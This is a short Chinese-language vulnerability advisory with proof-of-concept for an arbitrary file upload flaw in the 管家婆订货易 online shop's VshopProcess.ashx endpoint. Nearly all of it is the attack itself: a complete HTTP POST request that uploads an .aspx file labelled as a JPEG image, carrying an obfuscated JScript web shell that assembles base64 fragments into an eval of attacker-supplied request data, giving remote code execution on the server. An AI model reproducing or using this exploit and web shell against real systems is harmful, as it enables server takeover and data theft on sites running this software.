漏洞描述
管家婆订货易在线商城 VshopProcess.ashx 存在任意文件上传漏洞,攻击者可利用此漏洞获取服务器权限
管家婆订货易在线商城 VshopProcess.ashx 任意文件上传漏洞
PoC代码
POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 992
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryirk5kyptosrklo8s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
------WebKitFormBoundaryirk5kyptosrklo8s
Content-Disposition: form-data; name="fileup1i"; filename="pol0qqmknz.aspx"
Content-Type: image/jpeg
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MzYwN'+'jA7dm'+'FyIHN'+'hZmU9'+''+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('SQ=='))+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('bg=='))+char(0x271-0x21b)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('dQ=='))+char(0x250-0x1ed)+''+''+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Mg=='))+char(267-197)+char(0x1874b/0x397)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+char(0xde17/0x2ad)+''+'I7ZXZ'+'hbChS'+'ZXF1Z'+'XN0Lk'+'l0ZW1'+'bJ2Rh'+'eWluZ'+'yddLC'+'BzYWZ'+'lKTsx'+'MDgxO'+'DA7'+'')));%>
------WebKitFormBoundaryirk5kyptosrklo8s--